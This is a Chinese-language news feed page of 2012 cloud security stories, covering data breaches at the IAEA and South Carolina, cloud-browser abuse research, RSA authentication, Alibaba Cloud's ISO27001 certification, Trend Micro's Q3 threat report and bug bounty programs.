安全专家万涛表示,现在不是最好的时代也不应是最坏的时代。互联网的安全问题关乎信息时代的信任体系。电子证据法2013年1月就将生效,但个人隐私法还没出台。中国互联网的发展必须告别混乱、告别草莽暗黑、抄袭复制的江湖时代。在此我们呼吁国内IT安全企业首先要进行自律,要有自己的节操;同时我们期待国家积极推进行业标准的制定,并加强行业法律法规的完善。至少,下一次“××大战”的主战场,不应该在亿万用户的电脑上。

News stories from Thursday 29 November, 2012

Favicon for 云安全 23:49 黑客利用移动浏览器漏洞窃取云计算资源 » Post from 云安全 Visit off-site link

北卡罗莱纳州立大学和俄勒冈大学的的安全研究人员发现,一种基于MapReduce的新型技术可以让黑客劫持基于云计算的移动浏览器所使用的计算资源。

云浏览使用外部计算能力来处理网页,并交付给终端用户。研究人员表示,这项技术对移动浏览来说非常有用,否则必须依靠移动设备不太强大的硬件。目前,Opera Mini和Android Silk是使用该技术的最知名的浏览器。

然而,云可以用来完成繁重的任务,也可以被欺骗做许多其他的事情,研究人员根据这个问题发表了一篇论文。

测试

研究小组测试通过简写URL网站上存储的数据块,有效地欺骗了这些网站和云浏览器提供商,为他们进行运算。北卡罗莱纳州立大学助理教授William Enck(该论文的参与者)在一份声明中表示,该小组把以这种方式处理的数据量限制为100MB。

他表示:“这个数据量可以更大,但我们不想为我们使用的免费服务造成一个不必要的负担。”

Enck补充道,这项技术可以为黑客提供巨大的、暂时的、完全匿名的计算能力,使他们能够以极快的速度破解密码或执行其他恶意任务。

他表示,根据攻击的规模,用户可能不会注意到正在发生的事。

Enck说:“预防攻击事件发生取决于配置良好的云浏览器平台,以及攻击者正在执行的任务量。云浏览器运行商在监控资源使用时肯定会注意到一个服务使用的高峰。然而,要对此做出反应要求供应商在他们的框架中构建更多的防御措施。”

本文来自:PCWorld

News stories from Wednesday 28 November, 2012

Favicon for 云安全 22:51 国际原子能机构服务器遭窃 百多位专家信息泄密 » Post from 云安全 Visit off-site link

国际原子能机构(IAEA) —— 联合国核监督部门,证实该机构中的一台服务器被成功入侵。黑客把服务器中的信息公布到了网上。

美联社(AP)在28日报道:国际原子能机构透露该机构的一台服务被成功入侵,该机构超过100名专家的信息被公布于互联网。

一个叫做“Parastoo”的组织声称对11月25日公布专家名单的事件负责。事件反映了该组织对以色列未经申报就开始核武器项目的行为极其不满。

目前为止国际原子能机构还没有透露这个事件幕后可能涉及到的国家。

Parastoo在公布了联系资料的同时,还发布了一篇声明;该声明呼吁所有专家联名发表一份请愿书,要求国际原子能机构以公开的方式调查以色列Dimona核反应堆。

该组织说:“我们有充分的证据表示以色列正在进行危害性很大的行为,这样的话名单上给国际原子能机构提供技术支持的人都将是导致事故的共犯。”

国际原子能机构发言人Gill Tudor在发言中说到:“对于这次旧服务器的信息泄露我们深表遗憾。这个被入侵的服务器之前已经关闭了很长一段时间,而被入侵之前(服务器重新投入使用)专家们已经对该服务器的漏洞进行了修补。”

Tudor在给美联社的邮件中透露,国际原子能机构已经努力的去确保类似事件不会再次发生。

原文地址:UN nuclear watchdog confirms data leak (编译/仲浩 王旭东/审校)

如果你想感受大数据的魅力,11月30日-12月1日,北京新云南皇冠假日酒店,业内将迎来国内大数据领域最纯粹的技术盛会——HBTC 2012(Hadoop&BigData Technology Conference 2012)。Hadoop及云计算生态系统的力量齐聚北京,欢迎热爱开源的朋友们加入!

更多精彩内容,请关注新浪微博:@CSDN云计算;大会官网:HBTC 2012

本文为CSDN编译整理,未经允许不得转载。如需转载请联系market@csdn.net

News stories from Tuesday 27 November, 2012

Favicon for 云安全 18:38 RSA身份认证决策树构建强身份认证体系 » Post from 云安全 Visit off-site link

在安全领域,很少有人不知道RSA。1977年,由Ron Rivest、Adi Shamirh和LenAdleman在(美国麻省理工学院)开发的RSA,作为最有影响力的公钥加密算法,已被ISO推荐为公钥数据加密标准。而其背后的RSA公司历经几次变化,最终在2006年被EMC收购,成为RSA,EMC信息安全事业部。

2012年11月22日,EMC信息安全事业部RSA中国区资深技术顾问冯崇彪主持了“探寻可信、安全登录之谜”的技术研讨会。会上,他深度分析了四种主流身份认证的特点,并就RSA身份认证决策树做了演示,希望可以通过RSA开放接口与更多安全企业以及安全领域的开发者一起构建满足不同企业安全需求的生态系统。

对比四种主流身份认证

在他看来,来自桌面的移动终端的复杂多样,BYOD(Bring Your Own Device)接入的新需求,与来自数据中心端的虚拟化广泛应用与云计算的落地实践,还有来自更为高级的网络与黑客威胁,使得企业正面临越加严重的安全威胁。这其中,身份认证最为困难,但需求最为迫切。

这不难理解。企业最初仅需要对内部员工实现内部网络设备和远程设备的管理,但现在不仅要对员工,还需要对合同工、代理商、客户等各类客户,包括手机、平板、PC和笔记本以及其他接入工具要实现统一管理,复杂度呈指数增长。不止如此,曾经只存在企业内部服务器是数据如今也可能分布在公共云和Hosted应用上,多源管理难度更大。所以,要实现业务协同,任何时候从任意设备访问信息,保护内外敏感数据和用户访问业务安全,提升生产力,强身份认证必不可少。

目前主流身份认证主要有以下四种:

OTP、基于风险、PKI和动态基于知识的四类认证方式对比图

一次性密码(OTP),通过双因素认证的各类组合实现对一个人行为的判别。目前用的较多的是静态密码+令牌组成的。其中令牌可以是时间型(一分钟内有效),也可以是现在银行中常用的动态口令卡,U盾等。

基于风险的认证,更多可以看为依照风险的高低而采用多重技术手段的统一。比如对于普通账号和VIP账号之间采用不同认证方式;通过用户使用习惯设定验证信息(如IP地址转移需要再次认证等)。而这些对于风险的判断都是在后台完成的。这张图很好说明了现有安全方式的统一。

第三是数字证书(PKI),通过申请证书,进行激活来实现认证。比如银行与游戏厂商经常使用的U盾中存储的个人信息就是数字证书。

第四是动态的基于知识的认证,通过询问客户问题的方式来认证用户。问题库是基于现实中公共数据资源和商业数据资源,通过用户提前输入作储备,登录时通过对相关回复做验证的方式来确认。

RSA身份认证决策树支持不同需求

 

基于风险的认证更受重视

四类认证在市场上各有应用群。但结合国际越来越重视基于风险的认证的趋势,冯崇彪认为,“建立基于风险的分析是所有认证解决方案的基础”。针对不同的用户群,应该有一套可以提供广泛认证技术、方法和平台可以满足独特需求的灵活选择方案。这其中,既包含可为不同用户群提供强身份认证,也包含提供不同认证方式以及认证流程,及端到端认证方案。

为此,RSA推出了针对小型和中企业的RSA Authentication Manager Express,企业级用户的RSA Authentication Manager,企业级-消费者应用的RSA Adaptive Authentication,大型机构的RSA Digital Certificate Services和面向B-C市场机构的RSA Identity  Verification。更为创新的是,企业用户只需要通过一个工具,回答以下几类问题,就能确定自己需要的哪一种类型的RSA身份认证决策树的方案。

  • 您是否控制最终用户的环境?
  • 访问是否仅限于web应用?
  • 您的身份认证是否需要对文件加密?
  • 身份认证方法是否要提供交易监控和其他检测?

开发者有机会与RSA合作

移动互联与云计算催生了各类生态系统,安全也不例外。RSA身份认证决策树可以帮助用户简化操作,但在接口方面仍需更多开发协作。冯崇彪表示:“对企业而言,一般存在三个层面的集成:客户端、中间层应用端和后台认证端。客户端方面,RSA有各类认证设备,比如针对BYOD可以提供软件认证方式来满足各类硬件的需求,同时也会提供KPI和开放结果,比如与AppStore来做集成。中间层,有些应用已经内嵌了RSA的认证技术,通过RSA自适应身份认证直接做配置即可实现认证;对客户自己研发的应用或系统,则需要通过RSA开放接口来认证。以业内较为关注的信息防泄露为例,RSA认证系统可以和第三方的信息防泄露集成,把认证集成到信息防泄漏系统的登录认证中,名单可以通过官网面去看,而针对于不同的信息防泄露,有很多直接可以跟RSA的认证系统集成(RSA Ready),个性化需求则可以通过双发的技术部门来与RSA开发接口对接来完成。后台认证,RSA提供了各类认证方式来满足不同企业的需求。”

对于集成所涉及的改造代码等工作,冯崇彪说:“做接口,动态口令和自适应认证等方面,如RSA出一个接口与企业端应用集成所需要工作不大,但是数字证书则要多一些。RSA的接口和文档都是开放的,也希望与国内更多安全厂商和安全领域的开发者一起合作,共同为不同企业的安全需求提供更加周到的服务”。

本文为CSDN原创,未经允许不得转载。如需转载请联系market@csdn.net。

News stories from Friday 23 November, 2012

Favicon for 云安全 18:08 阿里云成国内首家过ISO27001认证的云安全服务商 » Post from 云安全 Visit off-site link

近日,阿里云计算有限公司通过了由BSI(英国标准协会)审核的ISO27001:2005(信息安全管理体系)认证,成为BSI在国内审核通过ISO27001的第一家云计算安全服务提供商。

ISO27001是一项信息安全管理国际标准,该标准由英国标准协会(BSI)于1995年2月提出并陆续完善,是目前国际上最权威、最严格、也是最被广泛接受和应用的信息安全标准。

阿里云计算业务总经理陈金培接受BSI高博士颁证

通过ISO27001检验阿里云信息安全水平

用户使用云计算最大的障碍之一是对于安全的担忧,作为面向公众提供云计算服务的公司,阿里云不断从管理和技术等方面,提升信息安全水平,提升客户对云计算的信任,让客户能放心的把数据和应用部署在阿里云的云计算平台上。

阿里云已经具备了良好的信息安全管理基础,建立了一套以自动化安全体系为主,辅以管理手段的互联网安全与内控体系,达到国内的领先水平。阿里云的所有信息系统通过国家信息系统等级化保护测评,作为工信部云计算安全试点的企业,阿里云形成了满足国家、国际云计算安全控制要求,可持续的云计算安全评估方法,诞生了覆盖传统信息安全和云计算安全管控的“阿里云安全模型”。阿里云还成为了CSA(Cloud Security Alliance,云安全联盟)和BSI联合推出的面向云服务提供商的安全开放框架在中国大陆地区的第一家试点机构。

ISO27001是基于信息资产信息安全风险管理为核心的体系,让企业的信息安全管理水平经历严格的审核,从信息安全体系的核心和管控思想两个方面,都能检验阿里云作为云计算服务提供商提供给客户的安全承诺。面对个人信息泄露、个人隐私保护及云计算带来的相关法律和合规要求,ISO27001对于隐私保护和法律方面的合规管理也提供了规范。

本次认证的通过,标志着阿里云的信息安全管理水平与国际先进水平完全接轨,而通过ISO27001认证,持续提升客户的信任度,也成为阿里云的必经之路。

传统规范使云计算信息安全再上高峰

云计算是一个新兴行业,业界缺乏对于云计算安全管理的相关标准与最佳实践,云计算安全目前仍然缺乏一个国际标准。但即使在云计算的背景下,云计算安全与传统信息安全的安全目标仍是相同的:保护信息资产的保密性、完整性、可用性。诸如信息安全风险管理;人力资源、物理、网络和主机安全;业务连续性;数据中心运维等方面,阿里云将满足ISO27001:2005作为基线要求。

由于ISO27001 是为成熟商业模式设立的安全标准,对云计算与新兴互联网企业在技术和管理方面的需求提出了一些挑战,比如在云计算巨大的网络带宽环境下,传统的防火墙已经在性能上无法支撑云计算海量的网络隔离要求。需要充分满足ISO27001的管控要求,但又不被传统安全管理带来的效率制约,是阿里云最大的挑战。阿里云解决了内部架构和人员的调整对管理流程带来的冲击,在多个工具或平台管理上,实现了对控制要求的技术支撑和管理流程的规范,在实施ISO27001后,进一步加强了员工的流程意识,将运维方面因流程执行不规范而导致的故障降到了最低。

在通过ISO27001审核的过程中,阿里云也获益良多。BSI培训师帮助阿里云在不断变化的管理和技术要求中,把握住体系建设的核心,明确风险管理的方向。还建议阿里云从提升客户安全信心的角度,将以内部IDC基础设施管理为主的认证范围,扩大为以对外产品安全管理为主认证范围。最终阿里云的证书范围中包含了云盾(云安全服务security as a service)这类对外的产品和服务,相比仅支撑内部安全管理的证书范围,对客户更具备可信任度。

ISO27001表明阿里云在内部的信息安全管理方面达到了一个新的里程碑,建立了最佳的信息安全运行方式。阿里云将通过ISO27001,持续提升公司的信息安全管理水平,实现中国云计算企业的安全最佳实践,为客户提供安全的云计算服务。

通过ISO27001认证使得阿里云的弹性计算、RDS及云盾产品在同类企业竞争中更具优势。作为率先通过认证的企业,阿里云认为,从数据安全的角度,承载客户数据、客户应用的云服务商必须通过获得ISO27001:2005认证,阿里云希望为行业发展竖立标杆,逐步规范云计算市场,提升行业门槛,保障行业对客户的服务水平。

News stories from Monday 19 November, 2012

Favicon for 云安全 22:42 IDF演示360安全卫士和安全浏览器偷传数据全过程 » Post from 云安全 Visit off-site link

11月16日,一场小规模黑客沙龙在北京举行。在IDF实验室,来自金山安全程冲、安全宝以及数位圈内安全技术爱好者聚在一起,一起讨论了当前桌面安全面临的问题。沙龙由方舟子在微博上炮轰360的产品为话题,IDF的工程师演示了360的安全卫士和安全浏览器如何在用户毫不知情的时候上传搜集到的用户隐私数据。据悉,本周晚些时候IDF将正式发布相关报告,安全方面技术人士可以关注下。

一般情况下,安全产品都会不同程度地访问用户隐私数据,但绝大多数安全产品都有相关提示。然而对于个人隐私的界定,在我国法律上依然没有明确的规范,因此不少安全产品都抱有打擦边球的心理。法律法规较为健全的国外,情况只是相对好一点罢了。业内人士多数认为安全的关键是界定和设置保护。方舟子与360的诉讼与反诉讼还在进行,工信部调查已经介入。而在“方周大战”方兴未艾之际,前日又有网友微博爆料“腾讯产品经理透漏QQ用户体验时会扫描用户硬盘”。事实上国内安全产品存在的问题相当普遍。

 

安全圈子的口水战越来越响,卷入的互联网企业越来越多,正方反方立场更加模糊不清。但对绝大多数人而言,泄漏已成定局,口水战本身没意义。这样的“××大战”已是周而复始几多轮回,作为安全产品的研发人员,是否该有些深刻的反思?是否有更现实的方式来帮助用户解决问题?

相关链接:方周大战IDF实验室QQ体验扫描硬盘

Favicon for 云安全 20:17 2012年Q3:Android危险增6倍,中国PE病毒居第一 » Post from 云安全 Visit off-site link

 2012年11月19日,趋势科技发布《2012年第三季度安全威胁报告》。报告显示:第三季度安全威胁焦点仍集中于移动设备,针对Android平台的高危恶意程序数量在第三季度剧增,从6月到9月暴增至17.5万个,同期增长近6倍。而在针对中国地区第三季度的病毒检测数量排名中,PE病毒超过木马跃居第一位,并爆发了PE_MUSTAN、PE_CORELINK等多种对网络安全造成严重威胁的PE病毒。在当前严峻的网络安全形势下,企业和个人消费者应该继续强化包括移动设备安全防护在内的网络安全措施,以保证网络环境的安全、健康。

针对Android平台的恶意程序数量激增

在第三季度,由于基于Android系统的移动设备迅速普及,针对Android 平台的恶意程序被不法分子用作搜集用户的地理位置、号码等隐私信息,或是被用来入侵智能手机中的收费功能,以骗取用户的真实财产。更危险的是,高达80%的Android设备没有安装安全防护软件,这让大多数Android用户难以应对相关安全威胁的攻击。

在趋势科技最新的统计报告中,仅在10月就新发现移动客户端病毒40,000个。在“移动客户端病毒家族排名”中,善于伪装成各种热门应用的FAKE病毒,以42%的份额排名榜首,而将自己伪装成一款免费的Flash播放器安装包并在后台发送短消息的BOXER病毒,以31%位居第二亚军。目前,中国区移动客户端病毒码1.339.00,已经包含病毒特征数约3.8万条,可以检测病毒20多万个。

 

移动客户端病毒家族排名

建议:使用者在下载应用程序前,应先了解 App 程序所要求的设备权限有哪些,再决定是否要使用该程序,以免泄露个人敏感信息。此外,用户还可以安装手机安全套件等信息防护软件,最大限度保护移动设备免受恶意软件的攻击。

中国地区PE病毒数量跃居第

在第三季度,PE病毒数量跃居中国区病毒检测总量第一位。其中,值得重点关注的有PE_MUSTAN病毒和PE_CORELINK病毒:PE_MUSTAN由WORM_MORTO(Windows远程桌面蠕虫)病毒演变而来,具有感染可执行文件的能力。该PE病毒除了能够通过感染文件、网络共享、可移动存储设备传播,还能通过远程桌面传播;PE_CORELINK病毒则会在系统Windows 目录释放linkinfo.dll,使用rootkit 隐藏自身。其通过网络共享以及移动存储设备传播,可以令系统大规模瘫痪。

2012第三季度中国地区各类型病毒检测数量

作为一种破坏性较大的恶意程序,PE病毒对感染的用户系统可能造成很大的影响,某些PE类型病毒甚至会将原文件替换导致无法修复。对于PE病毒,加强防范才是最好的解决方案。

木马依然为新增数量最多的病毒类型

在中国区,第三季度新增木马病毒特征343,621个,大约占新增病毒数量的60% 。木马由于隐蔽性高、可使病毒制造者直接的获利的特性,得以迅速的流行。从整体来看,木马也是中国目前存在数量最多的病毒类型。

2012年第三季度中国地区新增病毒类型

从图中可以看出,本季度除了新增的后门病毒以及IRC类型病毒数量稍稍有所下降之外,其他类型病毒新增数量均有所上升。

此外,还有一些信息:

专门锁定Java和Internet Explorer浏览器的零时差漏洞攻击现身,并已经被某些(APT)利用以进行攻击;

中国区第三季度通过Web传播的恶意程序中,约有29%为JS(脚本类型文件);

社交媒体与隐私权依旧是信息安全业界所关注的重点内容;

淘宝是钓鱼网站最喜欢仿冒的对象,一些游戏的充值网站也是钓鱼网站制作者的目标;

企业和政府机关依然是APT锁定攻击的对象,Lurid和Nitro APT攻击也更加精进。

News stories from Monday 29 October, 2012

Favicon for 云安全 23:08 美国南卡罗来纳州惨遭窃取360万社会保险号 » Post from 云安全 Visit off-site link

美国南卡罗来州的一个用于储存纳税人及信用卡信息的服务器被华丽的攻破,导致360万社会保险号和38.7万信用卡信息的泄露。在26号的新闻发布会中这个消息得到税务局官员的证实,并且还透露说其中有1.6万张信用卡未经加密。

执法部处长Mark Keel告诉记者调查发现最早的攻击始于今年的8月27日,并确认了攻击者的IP来自境外。

特勤处特工Michael Williams说到,他们从中介获得了一个关于10月事件的信息。也正是这个时候其他执法结构和管理人员得知了攻击信息。

作为应对,独立的信息安全公司Mandiant介入并着手应对方案的制定。Mandiant董事Marshall Heilman说,第一步会着手于移除黑客的攻击途径,使用额外的安全措施制止黑客,提高系统的日志功能让执法人员可以在黑客再次入侵的第一时间察觉。Heilman说:“这种类型的攻击是很常见的,几乎每天都在发生。一般情况下都不会造成轰动,除下规模很大的时候。”

南卡罗来州州长Haley已经指定监察长Maley更深层次的考虑信息安全性。Maley说,计划的第一步就是建立全职的特别小组去检验每一个政府系统并进行分类。Maley的主张不是单一的去防御,她企图把黑客抓住以儆效尤。她说:“南卡罗来莱州已遭受攻击,但是南卡罗来莱州会竭尽所能的进行反击。现在涉及到的不再只是境内的黑客了,还有来自其他国家的黑客。美国将开始一项规模空前的计划,用以处理类似问题。”

虽然调查还在继续,但是Keel表示揭露过多的信息会增加黑客的抓捕难度,所以当下将不会公布更多的相关消息。

Haley要求居民给政府足够时间,因为过多的消息透漏不易于当下的形势。她要求居民们:“要意识到给予政府机构足够的工作空间。”而给工作机构的命令就是:“绳之以法,让他永远都无法在任何国家对任何人做出类似事情。”(编译/@CSDN仲浩

原文链接:South Carolina suffers theft of 3.6M social security numbers

11月30日-12月1日,北京新云南皇冠假日酒店,业内将迎来国内大数据领域最纯粹的技术盛会——HBTC 2012(Hadoop&BigData Technology Conference 2012)。Hadoop及云计算生态系统的力量齐聚北京,欢迎热爱开源的朋友们加入!报名网址参见HBTC 2012

更多精彩内容,请关注新浪微博:@CSDN云计算;大会官网:HBTC 2012

News stories from Wednesday 24 October, 2012

Favicon for 云安全 18:30 5美元买100万份Facebook个人数据? » Post from 云安全 Visit off-site link

5美元可以拥有超过100万的Facebook数据?是传闻吗?以下是文章直译:

我有一个很特别的习惯,就是在网络上寻找一些廉价的交易。今天我精挑细选做了一单,竟然有超过100万的Facebook数据,包括全名,E-mail地址,还有Facebook的专属地址。

我按捺不住心中的激动,快速的检查了一遍这些数据,我的天!绝对是惊喜,没错!天大的惊喜:大多数数据是真实的,甚至他们中的某些人我都认识。

100万的Facebook账户?WTF?

卖家的描述:


此列表中信息的收集是通过Facebook应用程序,仅仅是一些活跃的Facebook用户,其中的大部分来自美国,加拿大,英国和欧洲。当然也有来自其他国家的一些用户,但是他们几乎全讲英语,这是因为我们提供的所有的应用程序都是以英文撰写的,如果想正确地使用它们,是需要阅读说明书的。这份名单每月提供一次检查和验证,这样你就不会得到一个无效或重复的电子邮件地址列表。无论你是提供Facebook,Twitter,社交媒体相关甚至其他一般性的产品或服务,相信这个表单对你会有很大的帮助。最后,该列表在一个压缩的excel格式中被分成12页,每页有大约10万个电子邮件地址,名字,姓氏和Facebook的个人资料信息。


你还感觉到安全吗?

不要怀疑,只需要5美元,你绝对没有听错——5美元!

后记:

事件的真实性,还在进一步的考证之中。该消息最初是来自一个很知名的外国网站DZone,不敢错过这条消息,更多精彩评论请关注原文。(编译/@CSDN王鹏,审校/包研)

原文链接:I just bought more than 1 million …Facebook data entries. OMG!

本文为CSDN编译整理,未经允许不得转载。如需转载请联系market@csdn.net

Favicon for 云安全 00:33 想让你的云数据更安全?BYOD吧! » Post from 云安全 Visit off-site link

日益流行的携带自己的设备办公(BYOD)政策让CIO和安全专家等传统主义者担心,但对已经使用软件即服务(SaaS)解决方案的机构来说,BYOD会让数据更加安全。原因很简单:BYOD减少了用户发生错误的可能性。

BYOD指的是允许员工在工作时使用他们自己的计算设备的政策。采用BYOD,企业削减了硬件采购和维护的开销,而且员工可以自由选择使用哪种手机、 平板电脑或最能满足他们偏好的笔记本电脑。

BYOD的明显缺点是难以支持和保护各种各样的设备。许多公司已经转向SaaS解决方案,作为这些问题的一个解决措施。

例如,使用谷歌应用程序,意味着没有文件或电子邮件存放在任何专用的BYOD硬件上,最大限度降低物理数据丢失的风险。谷歌企业应用套件可访问任何现代的、 主流的浏览器,确保任何BYOD笔记本电脑、平板电脑或手机可以访问服务。

对驻留在云上的数据的最大威胁是用户自身的错误。就拿谷歌应用程序来说,63%的数据损失是由于用户自己的错误,而不是由于谷歌应用服务的失败。

如果员工能够选择他们使用最舒服的设备,理论上他们在使用该设备时,也会犯更少的错误。此外,如果员工使用与客户相同的BYOD硬件进行工作,他们将为设备开发更多功能,这将进一步降低用户发生错误的可能性。

例如,用户有一台Windows工作电脑和一台MacBook个人笔记本电脑。每个平台的键盘快捷方式略有不同,因此很容易引起文字处理器和电子表格中的复制粘贴功能变形。通过BYOD策略,在工作中也使用MacBook电脑,则可消除这些转换错误。

对于非saas组织,三分之一的数据丢失是由于用户错误引起的,仅次于硬件故障。

对用户采用BYOD政策之前和之后的错误率,尚未有任何严谨的研究结果。尽管如此,通过对BYOD设备的熟悉度和舒适度,它在一定程度上减少了用户错误几率。

BYOD不能让你的数据无懈可击,但加上良好的安全策略、对普通用户的培训和有效的数据备份,它可以使公司数据的可用性和完整性有一个显著的区别。

本文来自:wired

News stories from Thursday 18 October, 2012

Favicon for 云安全 22:08 为了互联网的自由 海盗湾把服务迁移到云上 » Post from 云安全 Visit off-site link

北京时间10月18日,海盗湾的基础设施发生了重要变化,他们的整个操作被迁移到了云上。从现在起,海盗湾将通过几个分散在世界各地的云托管服务商为它的用户提供服务。海盗湾的官员说,此举将削减成本,确保更多的运行时间,并让网站几乎可以逃脱警察的搜捕,与此同时,保护用户数据的安全。

海盗湾的后端遍布全球多个云服务器,其中运行所有的包含该网站数据的虚拟副本的服务器。如果一个服务器被拆除,该网站的后端可将访问流量分配到仍然在线的有副本的服务器上。像Amazon这样的大型网站都使用类似的设置,它可以产生更可靠的服务并增加正常运行时间。

瑞典警方上次突击搜查在2006年,在5个地点查获海盗湾的25台服务器。这次突袭后,该网站的管理员采取了额外的步骤,以进一步掩盖他们服务器的位置。该网站说它已再一次被瑞典当局注意到。

“瑞典早在2010年由检察官Fredrik Ingblad发起了一轮新的海盗湾调查,”该网站在其博客中写道,“因为我们最近迁移到一个.SE(瑞典顶级域名)域名的举动,调查已提高了一个等级。”从表面上看,这些言论似乎预示着可能在不远的将来将有另一次突击检查。

本文来自:TechHive

News stories from Monday 15 October, 2012

Favicon for 云安全 23:15 白帽子谈云安全:Google驶于黑客共舞的最前沿! » Post from 云安全 Visit off-site link

如果你认为把数据托付给云是件很令人放心的事,那么三个以色列黑客会给你一个明确的忠告:云是不安全的,完完全全的不值得信赖。

云到底有多不安全?黑客Ben Hayak说:“这是如此的不安全以至于在亲测它安全之前我甚至都不会向PayPal里面添加一张信用卡。好在我之前也没有如此做过(添加信用卡……),他们一直存在一个很大的安全漏洞,而这个漏洞也是于不久前才关闭的。”

Hayak可以去测试PayPal云的安全性要特别感谢该公司的“漏洞赏金”项目 — 通过支付酬金给黑客来发现自生的安全缺陷。

通过Paypal的首席信息安全官Michael Barrett的博客了解到:安全性已经成为任何云商业公司的首要议程,但是仅仅依靠公司独自完成是不可能的。

因此该公司展开与“white hat”(黑客世界的佼佼者)黑客的全面合作,欲以发现XXS、CSRF、SQL资料隐码攻击及Authentication Bypass上的安全漏洞。

Barrett在博客中写到:“开始时,我还对给其它研究员提供漏洞的有偿研究持保留意见,但是呈现的数据完全显示出我的想法是错误的 — 我很乐意去接受此项意见。而且不得不承认这是个吸引研究者注意网络服务安全的有效手段,也必将发现更多安全性隐患。”

取而代之的让黑客们针对你,Paypal成为最新与黑客达成合作的云计算公司一员。其它拥有类似项目的公司还有FacebookMozilla及Twitter,然而第一个正式与黑客达成合作的公司却是Google — 从2010年底就启动了漏洞赏金项目(官方称为Vulunerability Reward Program)。

至今已有成百上千个黑客揭露了Goolge代码中的上万个安全漏洞,囊括了Google全范围产品,从Gmail到Google Docs,再到Blogger。

以色列的白帽子过去一直积极于Google项目;Hayak和Shai Rod(黑客)曾被评为Google 2012年度顶级漏洞揭发者。而黑客Nir Goldshlager更是Google 0x0a目录上创纪录的4黑客之一,这个目录基于漏洞发现的数量以及Google开出去的奖金。

他们3个共同效力于以色列的安全公司Avnet — 测试以色列企业网站建设的安全漏洞。而Google方面则是3个黑客的业余工作 — 但是却让他们赚了满盆满罐(每人基本上大几万美元),每个漏洞的发现Google都会付出500-3000美元不等。尽管来自世界各地的上千人都在盯着这个项目,但是他们3个仍旧如鱼得水 — Google是如此之大,有足够多的漏洞去探寻。

Hayak说:“最近,Shai给我们演示了通过Google Calendar上的动作来取得Google服务器的控制权。我们同样也可以通过Gmail来进入Goolge服务器,而且在我们潜入Google的Blogger.com后,我们还发现了让我们取得所有服务日志权限的代码。这些漏洞存在于服务器的设计,可以直接的利用获得上面所说的权限。”

他们人都表示,他们一直会充当白帽黑客,而且永远都不会从事“黑暗方面”的事情 — 然而Google的项目同样吸引了一些黑帽黑客。

Goldshlager透露:“我们了解到许多情况下黑客发现了漏洞之后都会通过黑市交易给一些犯罪团伙,接着转身又卖给了Google。”

这也是Hayak把数据托付给Google的一个原因 — 在某种程度下,他甚至会使用Gmail。他说:“有了这些通过发现漏洞获得酬金的人,所有存在的问题都会被很迅速的发现;从而即使某个漏洞掀起了波澜,漏洞带来的损失也会被控制在一定的程度上。”他还补充说,Google从2010年中国黑客全方位攻破它的安全网后就开始了这个项目。

Hayak说,从那(Google开启漏洞赏金项目)以后Google的安全事件有着显著的降低。但云仍然不是个安全的地方。Rod说,“我不信任它”,Avnet黑客团队的第三个成员。“付费的服务一般会物有所值。但是假如你使用免费的服务,那么你必须面对一堆的攻击。”

Rod谈到,免费和付费账户安全性是一样的 — 最起码开始时是这样的。但是公司总是莫名其妙的觉得他们对付费用户数据的安全有着更大的责任。他说:“这甚至不仅体现在安全性上,还有隐私方面的问题。我认为在阅读过许多网络服务的TOS(服务条款)后,肯定有许多人在接受前会反复的思考。公司留着入侵用户账户的机会越多(比如扫描用户的信息,以便给他们发送更有针对性的广告),安全漏洞出现的可能性就越大。”

Hayak还说,单纯的就黑客而言:像Google这样拥有漏洞赏金项目的公司比那些没有的处境要好多了。他还说:“我不能告知你关于App Store与Amazon的安全性怎样,是因为我没有合法的测试途径。但是事实上Google、Paypal及其他拥有漏洞赏金项目的公司愿意让像我们这样的人去测试它的系统,就说了他们对于安全性重视程度。”

Goolge漏洞赏金项目支出表

(编译/仲浩 王旭东/审校 原文来自ZDNet

欢迎关注@CSDN云计算微博,了解更多云安全信息。

本文为CSDN编译整理,未经允许不得转载。如需转载请联系market@csdn.net

News stories from Friday 12 October, 2012

Favicon for 云安全 16:30 你的云账户安全吗? » Post from 云安全 Visit off-site link

安全问题是导致对公共云的怀疑一些最持久的因素。我们经常听到客户问:“我如何确定我的数据在云中是安全的?无法泄露给其他用户?”这就是为什么云供应商消除这些担忧,并提供一个完全安全的公共云是如此的重要。不幸的是,当可怕的行业趋势出现时,云安全仍然得到了一个坏名声。

例如“脏磁盘”现象。自从信息安全咨询方面的研究结果暴露了一些主要的云服务提供商管理虚拟服务器方式中的安全漏洞后,这个“脏磁盘”就成为云计算中的严重数据漏洞。“脏磁盘”是指公有云磁盘映像保留了上一位客户的一些残余的数据,有可能造成数据泄露的风险或暴露给其他用户。这些磁盘还没有被正确地清理就被虚拟机管理程序使用,这意味着剩下的数据可能落入另一个客户的手中,甚至有可能是一个知道这个安全漏洞的网络罪犯。

围绕“脏磁盘”引起了许多潜在的对云数据安全性的担忧。从那时起,我们已经看到了很多在云中存储数据产生危险的新闻。本月早些时候,《连线》科技记者Mat Honan写到有他的iCloud账户被黑客入侵,并且资料遭到破坏。这个问题是由客户服务系统的缺陷造成的,而不是一个纯粹的技术漏洞,但它仍然显示了在一个云连接的世界,任何形式的破坏都很危险。

《信息周刊》2012年云安全及风险调查发现,公共云服务的安全性问题是近一半(48%)的受访者没有计划云服务的主要原因。数据的隐私和安全不仅是为了保持IaaS的采用,他们对云服务未来的增长更起着至关重要的作用。

发生数据泄漏的“脏磁盘”,是多租户环境中的虚拟驱动器重叠的结果。本质上,当虚拟驱动器在物理磁盘上创建时,他们有时会在以前存在的驱动器上重叠,导致潜在的数据泄漏到新的驱动器。加密是防止这种危险的一个可靠方式,因为它使意外遇到的人难以辨认数据。然而,数据加密的问题是,它依赖于客户总是勤于加密他们的数据。若要消除这种风险,并防止数据泄露,供应商应给每一个客户的完全加密的驱动器的选择,这样他们就不必担心微观管理数据的安全。这样一来,他们获得了他们的机密数据在云中的完全控制权。真正的安全是指为确保客户吸收数据提供方便的保护。

在现实中,“脏磁盘”和数据泄漏是供应商的问题,而不是云服务固有问题。IaaS不添加任何额外的风险,因为这个问题是任何物理存储的基础。供应商必须采取合理的措施保护云用户,正如企业亦有实施明智的措施处理报废的驱动器。因此,IaaS可以作为安全或不安全的任何物理基础设施。良好的安全取决于负责任的供应商和受过教育的客户。该行业想要向前发展,必须采取正确的预防措施,解决安全性问题,让公共云客户在“夜晚”可以安心入睡。

本文来自:wired

News stories from Wednesday 10 October, 2012

Favicon for 云安全 00:51 网络攻击日渐猖獗 平均成本增加6%达890万美元 » Post from 云安全 Visit off-site link

根据美国市场研究机构Ponemon Institute对56家企业和政府部门进行的一项调查显示,在过去的一年里,他们在网络攻击上的花费平均为890万美元。这比前一年增加6%。

